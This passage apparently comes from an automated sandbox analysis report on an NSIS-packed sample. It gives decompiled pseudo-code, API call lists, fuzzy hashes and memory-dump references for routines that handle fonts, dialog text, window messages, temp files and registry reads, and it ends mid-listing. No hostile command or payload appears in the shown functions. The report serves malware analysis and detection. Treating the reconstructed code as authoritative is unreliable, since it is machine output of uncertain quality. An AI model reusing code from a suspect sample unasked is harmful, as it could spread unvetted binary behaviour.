                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                          • Opcode ID: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                                                                                                                                          • Instruction ID: af2208a9c993d9ce4f8579721101e2d802b93c806783de9e53f89228710c5587
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d39b7960c4b589ca11e41561aab3825f23cbdbd0ce465e9420b3b3e566fd9b2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA212A72E00109AFCF15DFA4DD85AAEBBB5EB48304F24407EF901F62A1CB389951DB54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 73%
                                                                                                                                                                                                          			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b850->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b860 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b867 = 1;
				 *0x40b864 = _t15 & 0x00000001;
				 *0x40b865 = _t15 & 0x00000002;
				 *0x40b866 = _t15 & 0x00000004;
				E004062E0(_t9, _t31, _t33, 0x40b86c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b850);
				_push(_t18);
				_push(_t33);
				E004061AB();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                                                                                                                                          0x00401e35
                                                                                                                                                                                                          0x00401e40
                                                                                                                                                                                                          0x00401e42
                                                                                                                                                                                                          0x00401e4f
                                                                                                                                                                                                          0x00401e66
                                                                                                                                                                                                          0x00401e6b
                                                                                                                                                                                                          0x00401e78
                                                                                                                                                                                                          0x00401e7d
                                                                                                                                                                                                          0x00401e81
                                                                                                                                                                                                          0x00401e8c
                                                                                                                                                                                                          0x00401e93
                                                                                                                                                                                                          0x00401ea5
                                                                                                                                                                                                          0x00401eab
                                                                                                                                                                                                          0x00401eb0
                                                                                                                                                                                                          0x00401eba
                                                                                                                                                                                                          0x00402620
                                                                                                                                                                                                          0x00401569
                                                                                                                                                                                                          0x004029a5
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a69

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401E38
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                                                                                                                                                          • MulDiv.KERNEL32 ref: 00401E5A
                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0040B850), ref: 00401EBA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                                          • Opcode ID: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                                                                                                                                          • Instruction ID: bda7ea4a963eadc9936f181c2ed760bd7850ebe674c1e58b805f7706cadb7525
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1cbb2668a8e0048c904ace968a64d6fe2784e3b1926127080350a50dd5622c8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3016D72504248AEE7007BB1AE4AA9A3FF8E755301F10887AF141B61F2CB7804458B6C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404B1A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E00404B1A(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062E0(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062E0(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062E0(_t41, _t47, 0x42a8b8, 0x42a8b8, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a8b8), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ec18, _a4, 0x42a8b8);
			}



















                                                                                                                                                                                                          0x00404b20
                                                                                                                                                                                                          0x00404b25
                                                                                                                                                                                                          0x00404b2d
                                                                                                                                                                                                          0x00404b2e
                                                                                                                                                                                                          0x00404b3b
                                                                                                                                                                                                          0x00404b43
                                                                                                                                                                                                          0x00404b44
                                                                                                                                                                                                          0x00404b46
                                                                                                                                                                                                          0x00404b48
                                                                                                                                                                                                          0x00404b4a
                                                                                                                                                                                                          0x00404b4d
                                                                                                                                                                                                          0x00404b4d
                                                                                                                                                                                                          0x00404b54
                                                                                                                                                                                                          0x00404b5a
                                                                                                                                                                                                          0x00404b5a
                                                                                                                                                                                                          0x00404b61
                                                                                                                                                                                                          0x00404b68
                                                                                                                                                                                                          0x00404b6b
                                                                                                                                                                                                          0x00404b6e
                                                                                                                                                                                                          0x00404b6e
                                                                                                                                                                                                          0x00404b72
                                                                                                                                                                                                          0x00404b82
                                                                                                                                                                                                          0x00404b84
                                                                                                                                                                                                          0x00404b87
                                                                                                                                                                                                          0x00404b30
                                                                                                                                                                                                          0x00404b30
                                                                                                                                                                                                          0x00404b37
                                                                                                                                                                                                          0x00404b37
                                                                                                                                                                                                          0x00404b8f
                                                                                                                                                                                                          0x00404b9a
                                                                                                                                                                                                          0x00404bb0
                                                                                                                                                                                                          0x00404bc0
                                                                                                                                                                                                          0x00404bdc

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00404BC0
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,0042A8B8), ref: 00404BD3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                          • Opcode ID: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                                                                                                                                          • Instruction ID: 2e00c39cbbb7080f6c78f9bc89fda30cce30f66f6b884b1aab771d4f97bc656b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08f9c178ad4fdce5ba5a134203cc09d67d66b4423bbb0e6013138279e3fed682
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9111B7736041282BDB00656D9C42FAE3298DB85374F25027BFA26F71D1EA79DC2242ED
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                                          			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E004061AB();
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                                                                                                                                          0x00401c2e
                                                                                                                                                                                                          0x00401c30
                                                                                                                                                                                                          0x00401c37
                                                                                                                                                                                                          0x00401c3a
                                                                                                                                                                                                          0x00401c3d
                                                                                                                                                                                                          0x00401c47
                                                                                                                                                                                                          0x00401c4b
                                                                                                                                                                                                          0x00401c4e
                                                                                                                                                                                                          0x00401c57
                                                                                                                                                                                                          0x00401c57
                                                                                                                                                                                                          0x00401c5a
                                                                                                                                                                                                          0x00401c5e
                                                                                                                                                                                                          0x00401c67
                                                                                                                                                                                                          0x00401c67
                                                                                                                                                                                                          0x00401c6a
                                                                                                                                                                                                          0x00401c6e
                                                                                                                                                                                                          0x00401c70
                                                                                                                                                                                                          0x00401cc5
                                                                                                                                                                                                          0x00401cc7
                                                                                                                                                                                                          0x00401cd0
                                                                                                                                                                                                          0x00401cd8
                                                                                                                                                                                                          0x00401cdb
                                                                                                                                                                                                          0x00401cdb
                                                                                                                                                                                                          0x00401ce4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00401c72
                                                                                                                                                                                                          0x00401c79
                                                                                                                                                                                                          0x00401c7b
                                                                                                                                                                                                          0x00401c7e
                                                                                                                                                                                                          0x00401c84
                                                                                                                                                                                                          0x00401c8b
                                                                                                                                                                                                          0x00401c8e
                                                                                                                                                                                                          0x00401cb6
                                                                                                                                                                                                          0x00401cea
                                                                                                                                                                                                          0x00401cea
                                                                                                                                                                                                          0x00401c90
                                                                                                                                                                                                          0x00401c9e
                                                                                                                                                                                                          0x00401ca6
                                                                                                                                                                                                          0x00401ca9
                                                                                                                                                                                                          0x00401ca9
                                                                                                                                                                                                          0x00401c8e
                                                                                                                                                                                                          0x00401ced
                                                                                                                                                                                                          0x00401cf0
                                                                                                                                                                                                          0x00401cf6
                                                                                                                                                                                                          0x004029a5
                                                                                                                                                                                                          0x004029a5
                                                                                                                                                                                                          0x00402a5d
                                                                                                                                                                                                          0x00402a69

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00401CB6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                          • Opcode ID: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                                                                                                                                          • Instruction ID: c2b49ebb6df65f965b847d27db55c839bb0ece9d55d01ae65463d35699866107
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f513ab6a3ebb62765d7b61154200c887099e4f9fcc296ff57337de7f7cd59e8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B215E71A44208BEEB05AFB5D98AAAD7FB5EF44304F20447EF502B61D1D6B88541DB28
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405BE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405BE5(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                                                                                                                                                                          0x00405be6
                                                                                                                                                                                                          0x00405bfd
                                                                                                                                                                                                          0x00405c05
                                                                                                                                                                                                          0x00405c05
                                                                                                                                                                                                          0x00405c0d

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403473,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00405BEB
                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000), ref: 00405BF4
                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405C05
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 2659869361-4017390910
                                                                                                                                                                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                                                                                                          • Instruction ID: 4aa12e920610aceb8e029670fdf9df43119f1a02786e7ce54b96f7a39d5643bc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3D0A762A09630BAD20136655C09DCB19088F12701B05006BF101B2191C73C4C5147FD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040396E, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040396E() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x184
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x188
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039CB();
				return E00405A15(_t11, "C:\\Users\\Albus\\AppData\\Local\\Temp\\nsqE488.tmp", 7);
			}






                                                                                                                                                                                                          0x0040396e
                                                                                                                                                                                                          0x0040397d
                                                                                                                                                                                                          0x00403980
                                                                                                                                                                                                          0x00403982
                                                                                                                                                                                                          0x00403982
                                                                                                                                                                                                          0x00403989
                                                                                                                                                                                                          0x00403991
                                                                                                                                                                                                          0x00403994
                                                                                                                                                                                                          0x00403996
                                                                                                                                                                                                          0x00403996
                                                                                                                                                                                                          0x00403996
                                                                                                                                                                                                          0x0040399d
                                                                                                                                                                                                          0x004039af

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000184), ref: 00403980
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000188), ref: 00403994
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403973
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsqE488.tmp, xrefs: 004039A4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsqE488.tmp
                                                                                                                                                                                                          • API String ID: 2962429428-2531198557
                                                                                                                                                                                                          • Opcode ID: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                                                                                                                                          • Instruction ID: e02401a4112a94a9765f7fc85388a0ec9ec9dd0d4867be743f4f38008bc29606
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c3bbf5256d3b09d74f88582b30b225da325b648228e2b1124762f0c8a79aaf4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36E08C71910714A6C124AF7CAE8E8853B285B893357208726F078F20F0C7789AA74EAD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004052E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                          			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a8a4 = _t16;
							E00404CA4();
						}
						L11:
						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C24(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040431D(0x413);
				return 0;
			}





                                                                                                                                                                                                          0x004052ec
                                                                                                                                                                                                          0x004052f6
                                                                                                                                                                                                          0x00405312
                                                                                                                                                                                                          0x00405334
                                                                                                                                                                                                          0x00405337
                                                                                                                                                                                                          0x0040533d
                                                                                                                                                                                                          0x00405347
                                                                                                                                                                                                          0x00405348
                                                                                                                                                                                                          0x0040534a
                                                                                                                                                                                                          0x00405350
                                                                                                                                                                                                          0x00405350
                                                                                                                                                                                                          0x0040535a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405368
                                                                                                                                                                                                          0x0040531f
                                                                                                                                                                                                          0x00405357
                                                                                                                                                                                                          0x00405357
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405357
                                                                                                                                                                                                          0x0040532b
                                                                                                                                                                                                          0x0040532d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040532d
                                                                                                                                                                                                          0x004052fc
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405303
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405317
                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00405368
                                                                                                                                                                                                            • Part of subcall function 0040431D: SendMessageA.USER32 ref: 0040432F
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                          • Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                                                                                                                                          • Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406134, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                          			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                                                                                                                                          0x00406142
                                                                                                                                                                                                          0x00406144
                                                                                                                                                                                                          0x0040615c
                                                                                                                                                                                                          0x00406161
                                                                                                                                                                                                          0x00406166
                                                                                                                                                                                                          0x004061a3
                                                                                                                                                                                                          0x004061a3
                                                                                                                                                                                                          0x00406168
                                                                                                                                                                                                          0x0040617a
                                                                                                                                                                                                          0x00406185
